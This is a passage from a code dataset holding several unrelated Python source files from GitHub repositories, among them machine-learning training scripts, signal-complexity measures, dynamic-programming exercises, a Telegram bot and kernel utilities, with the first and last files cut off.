= colorize(self.depth, (300, 1100))\n\t\t\t\tdepth_image = Image.fromarray(depth_image)\n\t\t\t\tdepth_image = ImageTk.PhotoImage(depth_image)\n\n\t\t\t\tif (self.rgb_panel or self.depth_panel) is None :\n\t\t\t\t\tself.rgb_panel = tki.Label(image=rgb_image)\n\t\t\t\t\tself.rgb_panel.image = rgb_image\n\t\t\t\t\tself.rgb_panel.pack(side=\"left\", padx=10, pady=10)\n\n\t\t\t\t\tself.depth_panel = tki.Label(image=depth_image)\n\t\t\t\t\tself.depth_panel.image = depth_image\n\t\t\t\t\tself.depth_panel.pack(side=\"right\", padx=10, pady=10)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tself.rgb_panel.configure(image=rgb_image)\n\t\t\t\t\tself.rgb_panel.image = rgb_image\n\n\t\t\t\t\tself.depth_panel.configure(image=depth_image)\n\t\t\t\t\tself.depth_panel.image = depth_image\n\t\t\t\t#=========================================================================================\n\n\t\t\t\tif self.flag_record:\n\t\t\t\t\tself.record.write_capture(self.frame)\n\t\t\t\t\tif time()-self.start >= 2.5:\n\t\t\t\t\t\tself.stop_callback()\n\n\t\texcept RuntimeError as e:\n\t\t\tprint(\"Runtime error: \",e)\n\t\t\n\tdef on_close(self):\n\t\tprint(\"closing\")\n\t\tself.stop_event.set()\n\t\tself.cap.stop()\n\t\tself.root.destroy()\n\t\tself.root.quit()","repo_name":"nishantg96/Kinect-RGB-D-Recorder","sub_path":"common/tk_utils.py","file_name":"tk_utils.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71603909902","text":"from arguments import get_args \nfrom model.unsupervised import UnsupervisedModel\nimport torch \nfrom data.dataClass import get_unsupervision_dataset\nimport os \nimport logging \nfrom loss import MMContrastiveLoss \nfrom lightly.loss import ntx_ent_loss\nfrom utils.unsupervisedUtils import save_embed,save_config_file,get_batch,EarlyStopping,save_checkpoint,compute_loss\nfrom torch.cuda.amp import GradScaler, autocast\nfrom tqdm import tqdm \nimport wandb \n\ndef train_on_one_epoch(args,model,train_loader,optimizer,scaler,n_iter,epoch_counter,meme_mmloss=None,meme_floss=None,mmcontr_loss=None):\n trainiterator = iter(train_loader)\n for loader_idx in range(len(train_loader)):\n batch = get_batch(args,trainiterator)\n\n if args.dryrun:\n if loader_idx == 4:\n print(\"Dry Run in Unsupervised train complete, exiting\")\n break\n\n with autocast(enabled=args.fp16_precision):\n out = model(batch)\n if args.memeloss:\n loss = compute_loss(args,out,epoch_counter,meme_mmloss=meme_mmloss,meme_floss=meme_floss)\n elif args.mmcontr:\n loss = compute_loss(args,out,epoch_counter,mmcontr_loss=mmcontr_loss)\n\n optimizer.zero_grad()\n\n scaler.scale(loss).backward()\n\n scaler.step(optimizer)\n scaler.update()\n n_iter += 1\n return loss\n\ndef train(args,model,earlyStopper,train_loader,optimizer,scaler,n_iter,meme_mmloss=None,meme_floss=None,mmcontr_loss=None):\n for epoch_counter in tqdm(range(args.epochs), disable=args.no_tqdm):\n loss = train_on_one_epoch(args,model,train_loader,optimizer,scaler,n_iter,epoch_counter,meme_mmloss=meme_mmloss,meme_floss=meme_floss,mmcontr_loss=mmcontr_loss)\n # earlyStopper(loss.item())\n\n print(\"Epoch: {}\\tLoss: {}\".format(epoch_counter, loss.item()))\n wandb.log({\"loss\": loss.item()})\n wandb.log({\"epoch\": epoch_counter})\n if args.dryrun:\n break\n\n if epoch_counter >= 10:\n scheduler.step()\n lr = optimizer.param_groups[0]['lr']\n wandb.log({\"learning rate\": lr})\n if epoch_counter % 5 == 0:\n checkpoint_name = 'checkpoint_{:04d}.pth.tar'.format(epoch_counter)\n save_checkpoint({\n 'epoch': args.epochs,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, is_best=False, filename=os.path.join(log_dir, checkpoint_name))\n print(f\"Checkpoint created at {checkpoint_name}\")\n\n if earlyStopper.early_stop:\n print(\"Early Stopping, Loss didn't decrease for several epochs\")\n break\n\n\nargs = get_args()\n\nif args.dryrun:\n args.experiment = 'dryrun'\n\nassert (not args.simclr) or (args.n_views > 1), \"SimCLR requires at least 2 image views\"\n\nif not args.disable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n args.gpu_index = -1\n\nprint(args)\nwandb.init(project=\"meme_experiments\", entity=\"meme-analysts\",mode=\"disabled\")\nwandb.run.name = args.experiment\nckpt_use = args.ckpt != ''\nmodel = UnsupervisedModel(args.arch, args.txtmodel, args.out_dim, args.dropout, args.projector, not ckpt_use, not ckpt_use)\nmodel.to(args.device)\nprint(f\"Unsupervised Model Name: {model.name}\")\n\nif ckpt_use:\n model.load_state_dict(torch.load(args.ckpt, map_location=args.device)['state_dict'])\n print(f\"Model Loaded from {args.ckpt}\")\n\ntrain_dataset = get_unsupervision_dataset(args)\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True)\noptimizer = torch.optim.Adam(model.parameters(), args.lr, weight_decay=args.weight_decay)\nscheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(train_loader), eta_min=0,\n last_epoch=-1)\npytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\nprint(\"Total Parameters: \", pytorch_total_params)\n\nsave_folder = '/home/viet/SSLMemes/saved_model/'\nif not os.path.exists(save_folder):\n os.mkdir(save_folder)\n\nlog_dir = os.path.join(save_folder,args.experiment)\nif not os.path.exists(log_dir):\n os.mkdir(log_dir)\nmmcontr_loss,meme_mmloss,meme_floss = None, None, None \nwith torch.cuda.device(args.gpu_index):\n if args.mmcontr:\n mmcontr_loss= MMContrastiveLoss(\n margin=args.margin,\n measure=args.measure,\n max_violation=args.max_violation\n ).to(args.device)\n if args.memeloss:\n meme_mmloss = MMContrastiveLoss(\n margin=args.margin,\n measure=args.measure,\n max_violation=args.max_violation\n ).to(args.device)\n meme_floss = ntx_ent_loss.NTXentLoss(args.temperature,args.moco_size).to(args.device)\n if args.vis_embed:\n log_dir = '/home/viet/SSLMemes/saved_model/'\n save_embed(args,model,train_loader,log_dir)\n else:\n scaler = GradScaler(enabled=args.fp16_precision)\n save_config_file(log_dir,args)\n n_iter = 0\n print(f\"Start SimCLR training for {args.epochs} epochs.\")\n print(f\"Using args: {args}\")\n\n earlyStopper = EarlyStopping(patience=10)\n train(args,model,earlyStopper,train_loader,optimizer,scaler,n_iter,meme_mmloss=meme_mmloss,meme_floss=meme_floss,mmcontr_loss=mmcontr_loss)\n print(\"Training has finished.\")\n\n checkpoint_name = 'last_checkpoint-{}.pth.tar'.format(model.name)\n filename = os.path.join(log_dir, checkpoint_name)\n save_checkpoint({\n 'epoch': args.epochs,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, is_best=False, filename=filename)\n\n print(f\"Model checkpoint and metadata has been saved at {log_dir}.\")\n print(\"Completed self-supervised training.\")\n","repo_name":"FPTU-Thesis-CSAI/SemiMemes","sub_path":"src/trainUnsupervisedExpienet.py","file_name":"trainUnsupervisedExpienet.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19353555851","text":"import os\nimport numpy as np\nimport cv2\nfrom varname.helpers import debug\nfrom sports_dataloader import load_img_paths \n\n\n\n\ndataset_path = 'datasets/sportsMOT_volley_starter_pack/sportsMOT_volley_light_dataset'\ndataset_images = load_img_paths(dataset_path)\n\nfor image_path in dataset_images.values():\n img = cv2.imread(image_path)\n img2draw = img.copy()\n img2draw = cv2.resize(img2draw, None, fx=0.5, fy=0.5)\n kernel = np.array([ #edge detection\n [-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]\n ])\n # kernel = np.array([ #sharpen\n # [0, -1, 0],\n # [-1, 5, -1],\n # [0, -1, 0]\n # ])\n filtered_image = cv2.filter2D(img2draw, -1, kernel)\n out_image = np.vstack([img2draw, filtered_image])\n cv2.imshow('test', out_image)\n cv2.waitKey(-1)\n","repo_name":"petr-nazarov/Liga-learn-ml","sub_path":"image_convolution.py","file_name":"image_convolution.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13875510665","text":"# https://codeforces.com/blog/entry/78195\r\nN, S = map(int,input().split())\r\nA = list(map(int,input().split()))\r\nmod = 998244353\r\ndp = [[0 for j in range(S + 1)] for i in range(N + 1)]\r\ndp[0][0] = 1\r\n\r\n# dp[i][j] is the answer over all subsets of the first i elements of the array A that sum to j.\r\nfor i in range(N) : \r\n for j in range(S + 1) : \r\n # If we skip A[i], we can place in subset or not (two options)\r\n dp[i + 1][j] += 2 * dp[i][j]\r\n dp[i + 1][j] %= mod \r\n\r\n # If we pick A[i], increase the sum by A[i] and no. of elements by i.\r\n if j + A[i] <= S : \r\n dp[i + 1][j + A[i]] += dp[i][j]\r\n dp[i + 1][j + A[i]] %= mod\r\n \r\nprint(dp[N][S])\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Given a sequence A, find number of subsets whose sum is S\r\ndef my_attempt():\r\n # I just calculated the subset of numbers who sum to S.\r\n n, S = map(int, input().split())\r\n arr = list(map(int, input().split()))\r\n dp = [[-1]*(n+1) for _ in range(S+1)]\r\n def subsetSum(s, n, arr, v):\r\n if dp[s][n]!=-1:\r\n return dp[s][n]\r\n else:\r\n if s == 0:\r\n return 1\r\n elif s!=0 and n==0:\r\n return 0\r\n else:\r\n if arr[n-1] > s:\r\n dp[s][n] = subsetSum(s, n-1, arr, v)\r\n return dp[s][n]\r\n else:\r\n exclude = subsetSum(s, n-1, arr, v)\r\n\r\n v1 = v.copy()\r\n v1.append(arr[n-1])\r\n include = subsetSum(s - arr[n-1], n-1, arr, v1)\r\n\r\n\r\n dp[s][n] = include + exclude\r\n return dp[s][n]\r\n\r\n v = []\r\n print('Number of subsets whose elements add upto S:', subsetSum(S, n, arr, v))\r\n\r\n \r\n","repo_name":"anoubhav/Codeforces-Atcoder-Codechef-solutions","sub_path":"Atcoder/169/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25007575328","text":"\"\"\"best_sum_tabulation.py\"\"\"\nfrom typing import List, Optional, Any\n\"\"\"\nPROBLEM:\n\nWrite a function 'best_sum(target_sum, numbers)' that takes in a\ntarget_sum and an array of numbers as arguments.\n\nThe function should return an array containing the shortest\ncombination of numbers that add up to exactly the target_sum.\n\nIf there is a tie for the shortest combination, you may return any\none of the shortest.\n\"\"\"\n\n# Recursive method for reference\n'''\ndef best_sum_recursive(target_sum: int,\n numbers: List[int]) -> Optional[List[int]]:\n \"\"\"Recursive method for solving problem using no caching\n or memoization.\"\"\"\n if target_sum < 0:\n return None\n if target_sum in numbers:\n return [target_sum]\n shortest_combo: Optional[List[int]] = None\n for num in numbers:\n new_target_sum: int = target_sum - num\n adders: Optional[List[int]] = best_sum_recursive(\n new_target_sum, numbers)\n if adders is not None:\n combo: List[int] = adders.copy()\n combo.insert(0, num)\n if shortest_combo is None or len(combo) < len(shortest_combo):\n shortest_combo = combo\n return shortest_combo\n'''\n\n\ndef best_sum(target_sum: int, numbers: List[int]) -> Optional[List[int]]:\n \"\"\"Iterative method for solving problem using\n tabulation.\"\"\"\n table: List[Any] = [None] * (target_sum + 1)\n table[0] = []\n for i in range(target_sum):\n if table[i] is not None:\n for num in numbers:\n advance: int = i + num\n if advance <= target_sum:\n if not table[advance] or len(table[i]) + 1 < len(\n table[advance]):\n table[advance] = table[i].copy()\n table[advance].append(num)\n target_sum_list: Optional[List[int]] = table[target_sum]\n return target_sum_list\n\n\n# TESTS\nassert best_sum(7, [5, 3, 4, 7]) == [7]\nassert best_sum(7, [5, 3, 4]) == [3, 4]\nassert best_sum(8, [2, 3, 5]) == [3, 5]\nassert best_sum(8, [1, 4, 5]) == [4, 4]\nassert best_sum(100, [1, 2, 5, 25]) == [25, 25, 25, 25]\n","repo_name":"plasticuproject/dynamic_programming_course","sub_path":"sum/best_sum/best_sum_tabulation.py","file_name":"best_sum_tabulation.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38550835087","text":"def main(search, user_id, user_name):\n import pandas as pd\n from os import getcwd\n import telepot\n\n\n token = \"\"\n bot = telepot.Bot(token)\n\n classification_index = pd.read_excel(r'classification_index_arranged.xlsx')\n\n list_of_titles = classification_index[\"title\"].tolist()\n list_of_file_names = classification_index[\"file_name\"].tolist()\n\n search = search\n index_no = []\n index_no_ = 0\n mark = []\n mark_ = 0\n for i in list_of_titles:\n j = i.split()\n for k in j:\n for l in range(len(search)):\n search\n if k.upper() == search[l].upper():\n mark_ += 1\n mark.append(mark_)\n index_no.append(list_of_titles[index_no_])\n mark_ = 0\n index_no_ += 1\n greatest_mark = 0\n greatest_markman =\"\"\n count = 0\n for i in mark :\n if int(i) > greatest_mark:\n greatest_mark = i\n greatest_markman = index_no[count]\n count += 1\n greatest_markman = str(greatest_markman)\n classification = greatest_markman\n index_no = list_of_titles.index(classification)\n file_name = list_of_file_names[index_no]\n FILE = file_name\n user_name = user_name\n file_name = str(getcwd()) + \"/classifications/classifications/\" + file_name\n caption_ = \"Classification of \" + greatest_markman\n bot.sendPhoto(chat_id = user_id, photo=open(file_name, \"rb\"), caption=caption_)\n","repo_name":"akhilrajs/drug-of-choice-bot","sub_path":"classification_table.py","file_name":"classification_table.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"29517325359","text":"import random \nimport pandas as pd\nimport os\n\ndf = pd.read_csv('Results.csv')\nmodel = {}\nanswers=[]\nstep=5\nh=0\nfor i in range(0,len(df), step):\n data = df['answer_text'][i:i+step]\n for line in data:\n line = line.lower().split()\n for i, word in enumerate(line):\n if i == len(line)-1: \n model['END'] = model.get('END', []) + [word]\n else: \n if i == 0:\n model['START'] = model.get('START', []) + [word]\n model[word] = model.get(word, []) + [line[i+1]] \n\n answer = ''\n for i in range(step*3):\n generated = []\n while True:\n if not generated:\n words = model['START']\n elif generated[-1] in model['END']:\n break\n else:\n words = model[generated[-1]]\n generated.append(random.choice(words))\n \n answer = answer + \"'\" + ' '.join(generated) + \"',\"\n if i%3==0: \n answers.append(answer.strip(','))\n answer = ''\n\nprint('Total answers : ', len(answers))\nprint('Total questions : ', len(df))\ndf['distractor'] = answers\ndf.to_csv('exp.csv', index=None)\n \n","repo_name":"weeping-angel/ValueLabs-ML-Hiring-Challenge-2019","sub_path":"MarkovChainSentenceGeneration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"6047207315","text":"import numpy as np\nfrom typing import Union, Optional\nfrom alibi.utils.distance import squared_pairwise_distance\n\n\nclass GaussianRBF:\n def __init__(self, sigma: Optional[Union[float, np.ndarray]] = None) -> None:\n \"\"\"\n Gaussian RBF kernel: :math:`k(x,y) = \\\\exp(-\\\\frac{||x-y||^2}{2\\\\sigma^2})`.\n A forward pass takes a batch of instances `x` of size `Nx x f1 x f2 x ...` and\n `y` of size `Ny x f1 x f2 x ... ` and returns the kernel matrix of size `Nx x Ny`.\n\n Parameters\n ----------\n sigma\n Kernel bandwidth. Not to be specified if being inferred or trained.\n Can pass multiple values to evaluate the kernel with and then average.\n \"\"\"\n super().__init__()\n self.config = {'sigma': sigma}\n\n if sigma is None:\n self.log_sigma = np.empty(1, dtype=np.float32)\n self.init_required = True\n else:\n if not isinstance(sigma, np.ndarray):\n sigma = np.array(sigma)\n\n sigma = sigma.reshape(-1,).astype(np.float32) # [Ns,]\n self.log_sigma = np.log(sigma)\n self.init_required = False\n\n @property\n def sigma(self) -> np.ndarray:\n return np.exp(self.log_sigma)\n\n def __call__(self, x: np.ndarray, y: np.ndarray, infer_sigma: bool = False) -> np.ndarray:\n \"\"\"\n Computes the kernel matrix between `x` and `y`.\n\n Parameters\n ----------\n x\n The first array of data instances.\n y\n The second array of data instances.\n infer_sigma\n Whether to infer `sigma` automatically. The `sigma` value is computed based on the median distance value\n between the instances from `x` and `y`.\n\n Returns\n -------\n Kernel matrix between `x` and `y` having the size of `Nx x Ny` where `Nx` is the number of instances in `x` \\\n and `y` is the number of instances in `y`.\n \"\"\"\n y = y.astype(x.dtype)\n x, y = x.reshape((x.shape[0], -1)), y.reshape((y.shape[0], -1)) # flatten\n dist = squared_pairwise_distance(x, y) # [Nx, Ny]\n\n if infer_sigma or self.init_required:\n n = min(x.shape[0], y.shape[0])\n n = n if np.all(x[:n] == y[:n]) and x.shape == y.shape else 0\n n_median = n + (np.prod(dist.shape) - n) // 2 - 1\n sigma = np.expand_dims((.5 * np.sort(dist.reshape(-1))[n_median]) ** .5, axis=0)\n self.log_sigma = np.log(sigma)\n self.init_required = False\n\n gamma = np.array(1. / (2. * self.sigma ** 2), dtype=x.dtype) # [Ns,]\n # TODO: do matrix multiplication after all?\n kernel_mat = np.exp(-np.concatenate([(g * dist)[None, :, :] for g in gamma], axis=0)) # [Ns, Nx, Ny]\n return np.mean(kernel_mat, axis=0) # [Nx, Ny]\n\n\nclass GaussianRBFDistance:\n def __init__(self, sigma: Optional[Union[float, np.ndarray]] = None):\n \"\"\"\n Gaussian RBF kernel dissimilarity/distance: :math:`k(x, y) = 1 - \\\\exp(-\\\\frac{||x-y||^2}{2\\\\sigma^2})`.\n A forward pass takes a batch of instances `x` of size `Nx x f1 x f2 x ...` and\n `y` of size `Ny x f1 x f2 x ...` and returns the kernel matrix of size `Nx x Ny`.\n\n Parameters\n ----------\n sigma\n See :py:meth:`alibi.utils.kernel.GaussianRBF.__init__`.\n \"\"\"\n super().__init__()\n self.kernel = GaussianRBF(sigma=sigma)\n\n def __call__(self, x: np.ndarray, y: np.ndarray, infer_sigma: bool = False) -> np.ndarray:\n kmatrix = self.kernel(x, y, infer_sigma)\n return 1. - kmatrix\n\n\nclass EuclideanDistance:\n def __init__(self) -> None:\n \"\"\"\n Euclidean distance: :math:`k(x, y) = ||x-y||`. A forward pass takes a batch of instances `x` of\n size `Nx x f1 x f2 x ... ` and `y` of size `Ny x f1 x f2 x ...` and returns the kernel matrix `Nx x Ny`.\n \"\"\"\n pass\n\n def __call__(self, x: np.ndarray, y: np.ndarray) -> np.ndarray:\n \"\"\"\n Computes the kernel distance matrix between `x` and `y`.\n\n Parameters\n ----------\n x\n The first array of data instances.\n y\n The second array of data instances.\n\n Returns\n -------\n Kernel distance matrix between `x` and `y` having the size of `Nx x Ny`, where `Nx` is the number of \\\n instances in `x` and `y` is the number of instances in `y`.\n \"\"\"\n y = y.astype(x.dtype)\n x, y = x.reshape((x.shape[0], -1)), y.reshape((y.shape[0], -1)) # flatten\n dist = np.sqrt(squared_pairwise_distance(x, y)) # [Nx, Ny]\n return dist\n","repo_name":"SeldonIO/alibi","sub_path":"alibi/utils/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":2207,"dataset":"github-code","pt":"47"} +{"seq_id":"70251940622","text":"import unittest\n\nfrom notification.service.notification_service import DiscordNotificationService\n\n\nclass TestDiscordNotificationService(unittest.IsolatedAsyncioTestCase):\n\n async def test_discord_send_notification(self):\n discord_service = DiscordNotificationService()\n try:\n await discord_service.send_notification(\"TEST: Hello World\")\n except Exception as e:\n self.fail(f\"Failed to send Discord notification: {e}\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"grygy/another-todo-app","sub_path":"notification_service/tests/notification/service/test_discord_service.py","file_name":"test_discord_service.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3725473616","text":"# Built-in imports\nimport math\nimport ctypes\n\n# External imports\nimport numpy as np\nfrom scipy.spatial.distance import pdist\nfrom scipy.signal import decimate\n\n# Medusa imports\nfrom medusa.components import ThreadWithReturnValue\nfrom medusa.utils import check_dimensions\n\n\ndef central_tendency_measure(signal, r):\n \"\"\"\n This method implements the central tendency measure (CTM). This parameter is\n useful to quantify the variability of a signal. It is based on calculating\n the second-order differences diagram of the time series and then counting\n the points within a radius \"r\". CTM assigns higher values to less variable\n signals\n\n References\n ----------\n Cohen, M. E., Hudson, D. L., & Deedwania, P. C. (1996). Applying\n continuous chaotic modeling to cardiac signal analysis. IEEE Engineering in\n Medicine and Biology Magazine, 15(5), 97-102.\n\n Parameters\n ----------\n signal : numpy.ndarray\n Signal with shape [n_epochs, n_samples, n_channels].\n r : double\n Radius used to compute the CTM.\n\n Returns\n -------\n ctm : numpy.ndarray\n CTM values for each channel in \"signal\". [n_epochs, n_channels].\n \"\"\"\n\n # Error check\n if not np.issubdtype(signal.dtype, np.number):\n raise ValueError('data matrix contains non-numeric values')\n\n # Check dimensions\n signal = check_dimensions(signal)\n\n # Signal dimensions\n n_epo = signal.shape[0]\n n_samp = signal.shape[1]\n n_cha = signal.shape[2]\n\n # Values within a range (mean +- 3 std)\n upper_bound = np.mean(signal, axis=1) + 3 * np.std(signal, axis=1)\n lower_bound = np.mean(signal, axis=1) - 3 * np.std(signal, axis=1)\n idx_within_range = np.logical_and((signal < upper_bound[:, None, :]),\n (signal > lower_bound[:, None, :]))\n idx_out_upper = (signal > upper_bound[:, None, :])\n idx_out_lower = (signal < lower_bound[:, None, :])\n\n # Maximum value in the above defined range\n max_value = np.empty((n_epo, n_cha))\n for ep in range(n_epo):\n for ch in range(n_cha):\n max_value[ep, ch] = np.max(\n abs(signal[ep, idx_within_range[ep, :, ch], ch]), axis=0)\n\n # Normalize the values within the range by its maximum.Values above that\n # range will be 1, and below the range will be - 1\n data_norm = np.zeros_like(signal)\n data_norm[idx_within_range] = np.divide(\n signal[idx_within_range],\n np.tile(max_value, (1, n_samp, 1)).flatten()[\n idx_within_range.flatten()])\n data_norm[idx_out_upper] = 1\n data_norm[idx_out_lower] = -1\n\n # Difference time series\n y = data_norm[:, 3:n_samp, :] - data_norm[:, 2:n_samp - 1, :]\n x = data_norm[:, 2:n_samp - 1, :] - data_norm[:, 1:n_samp - 2, :]\n\n # CTM - Values below the radius 'r'\n ctm = np.sum(np.sqrt(np.square(x) + np.square(y)) < r, axis=1) / (\n n_samp - 2)\n\n return ctm\n\n\ndef sample_entropy(signal, m, r, dist_type='chebyshev'):\n \"\"\" This method implements the sample entropy (SampEn). SampEn is an\n irregularity measure that assigns higher values to more irregular time\n sequences. It has two tuning parameters: the sequence length (m) and the\n tolerance (r)\n\n Notes: IF A = 0 or B = 0, SamEn would return an infinite value.\n However, the lowest non-zero conditional probability that SampEn should\n report is A/B = 2/[(N-m-1)*(N-m)].\n SampEn has the following limits:\n - Lower bound: 0\n - Upper bound : log(N-m) + log(N-m-1) - log(2)\n\n References\n ----------\n Richman, J. S., & Moorman, J. R. (2000). Physiological\n time-series analysis using approximate entropy and sample entropy. American\n Journal of Physiology-Heart and Circulatory Physiology.\n\n Parameters\n ----------\n signal : numpy.ndarray\n Signal with shape [n_epochs, n_samples, n_channels].\n m : int\n Sequence length\n r : float\n Tolerance\n dist_type : string\n Distance metric\n\n Returns\n -------\n sampen : numpy.ndarray\n SampEn value. [n_epochs, n_channels]\n \"\"\"\n # Check dimensions\n signal = check_dimensions(signal)\n\n # Check Errors\n if m > signal.shape[1]:\n raise ValueError('Embedding dimension must be smaller than the signal '\n 'length (m 1\n if binarised_signal.shape[1] > 1:\n threads = []\n for ch in range(binarised_signal.shape[1]):\n t = ThreadWithReturnValue(target=__lz_algorithm,\n args=(binarised_signal[:, ch],))\n threads.append(t)\n t.start()\n for ch_idx, t in enumerate(threads):\n result[ep_idx, w_idx, ch_idx] = t.join()\n else:\n result[ep_idx, w_idx, :] = __lz_algorithm(binarised_signal)\n return result\n\n\ndef __lz_algorithm(signal):\n \"\"\"\n Lempel-Ziv's complexity algorithm implemented in Python.\n\n References\n ----------\n F. Kaspar, H. G. Schuster, \"Easily-calculable measure for the complexity of\n spatiotemporal patterns\", Physical Review A, Volume 36, Number 2 (1987).\n\n Parameters\n ---------\n signal: numpy 1D array\n Signal with shape of [n_samples]\n\n Returns\n -------\n value: float\n Result of algorithm calculations.\n\n \"\"\"\n signal = signal.flatten().tolist()\n i, k, l = 0, 1, 1\n c, k_max = 1, 1\n n = len(signal)\n while True:\n if signal[i + k - 1] == signal[l + k - 1]:\n k = k + 1\n if l + k > n:\n c = c + 1\n break\n else:\n if k > k_max:\n k_max = k\n i = i + 1\n if i == l:\n c = c + 1\n l = l + k_max\n if l + 1 > n:\n break\n else:\n i = 0\n k = 1\n k_max = 1\n else:\n k = 1\n\n value = c * (np.log2(n) / n)\n return value\n\n\ndef __binarisation(signal, w_length, w_max, multiscale=False):\n \"\"\"\n This function returns a binarised version of original signal. It can be used\n in both multiscale and simple binarisations. If multiscale mode is chosen,\n signals are shortened so that they all have the same length, taking the\n maximum window as a reference. Binarisation is performed by means of a\n median-based comparison.\n\n Parameters\n ----------\n signal: numpy 2D array\n Signal with shape [n_samples x n_channels]\n w_length: int\n Window length to perform multiscale binarisation\n w_max: int\n Value of the maximum window length\n multiscale: bool\n If is True, performs the multiscale binarisation\n\n Returns\n -------\n signal_binarised: numpy.ndarray\n Signal binarised with shape of [n_samples_shortened x n_channels]\n The n_samples_shortened parameter is calculated from w_max to ensure that\n all signals have the same length, regardless of the window length used.\n \"\"\"\n\n if multiscale:\n if w_length is None:\n raise ValueError('Width of window must be an integer value')\n if w_length % 2 == 0:\n raise ValueError('Width of window must be an odd value.')\n if w_max is None:\n raise ValueError('Maximum window width must be an integer value')\n\n # Get smoothed version from original signal\n smoothed = __multiscale_median_threshold(signal, w_length)\n\n # Useful parameters\n half_wind = int((w_length - 1) / 2)\n max_length = signal.shape[0] + 1 - w_max\n length_diff = smoothed.shape[0] - max_length\n\n # Shorten original and smoothed version\n smoothed_shortened = \\\n smoothed[int(length_diff / 2):-int(length_diff / 2), :]\n signal_shortened = \\\n signal[half_wind: signal.shape[0] - half_wind, :]\n signal_shortened = \\\n signal_shortened[int(length_diff / 2):-int(length_diff / 2), :]\n\n # Define template of binarised signal\n signal_binarised = \\\n np.zeros((signal_shortened.shape[0], signal_shortened.shape[1]))\n\n # Binarise the signal\n idx_one = signal_shortened >= smoothed_shortened\n signal_binarised[idx_one] = 1\n\n else:\n signal_binarised = np.zeros((len(signal), signal.shape[1]))\n median = np.median(signal, axis=0)\n idx_one = signal >= median\n signal_binarised[np.squeeze(idx_one)] = 1\n\n return signal_binarised\n\n\ndef __multiscale_median_threshold(signal, w_length):\n \"\"\" Signal smoothing function. For each sample, we define a window in which\n the sample is in centre position. The median value of the window is\n calculated and assigned to this sample to obtain a smoothed version of the\n original signal.\n\n References\n ----------\n Ibáñez-Molina, A. J., Iglesias-Parro, S., Soriano, M. F., & Aznarte, J. I,\n Multiscale Lempel-Ziv complexity for EEG measures. Clinical Neurophysiology,\n (2015), 126(3), 541–548.\n\n Parameters\n ---------\n signal: numpy 2D array\n Signal with shape of [n_samples, n_channels]\n w_length: int\n Length of window to calculate median values in smoothing process\n\n Returns\n -------\n smoothed_signal: numpy 2D array\n Smoothed version with shape of [n_samples + 1 - w_length, n_channels]\n As a result of windowing, the final samples of the signal are lost.\n\n \"\"\"\n # Template of smoothed signal\n smoothed_signal = np.zeros((\n signal.shape[0] + 1 - w_length, signal.shape[1]))\n\n half_wind = int((w_length - 1) / 2)\n\n # Index of sample to be smoothed from median window value\n index = 0\n\n # We define a window with samp in central position and\n # get median value to smooth original signal\n for samp in range(half_wind, signal.shape[0] - half_wind):\n smoothed_signal[index, :] = np.median(\n signal[samp - half_wind: samp + half_wind], axis=0)\n index += 1\n return smoothed_signal\n\n","repo_name":"medusabci/medusa-kernel","sub_path":"medusa/local_activation/nonlinear_parameters.py","file_name":"nonlinear_parameters.py","file_ext":"py","file_size_in_byte":19618,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"27777401228","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport math\nfrom slang.utils import *\nfrom slang.models import LogisticRegression, LogisticRegressionFull\nfrom slang.train import *\nimport argparse\nimport matplotlib.pyplot as plt\nimport os\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--do_full_model\", default = True, type = bool)\nparser.add_argument(\"--task\", default = \"australian\", type = str)\nparser.add_argument(\"--batch_size\", default = 64, type = int)\nparser.add_argument(\"--n_epoch\", default = 1000, type = int)\nparser.add_argument(\"--beta\", default = 0.03, type = float)\nparser.add_argument(\"--alpha\", default = 0.03, type = float)\nparser.add_argument(\"--lambda\", default = 1., type = float)\nparser.add_argument(\"--max_ranks\", nargs='+', default = [1, 5, 10], type = int)\nparser.add_argument(\"--n_iter\", default = 4, type = int)\nparser.add_argument(\"--pow\", default = 0.51, type = float)\nparser.add_argument(\"--n_samples_train\", default = 12, type = int)\nparser.add_argument(\"--n_samples_eval\", default = 100, type = int)\nargs = parser.parse_args()\nparams = vars(args)\n\n\nif params[\"task\"] == \"australian\":\n src = 'data/australian_presplit/australian_scale_'\n \nelif params[\"task\"] == \"cancer\":\n src = 'data/breast_cancer_presplit/breast_cancer_scale_'\n \nelse:\n print(\"Sorry, I can do only australian and cancer for 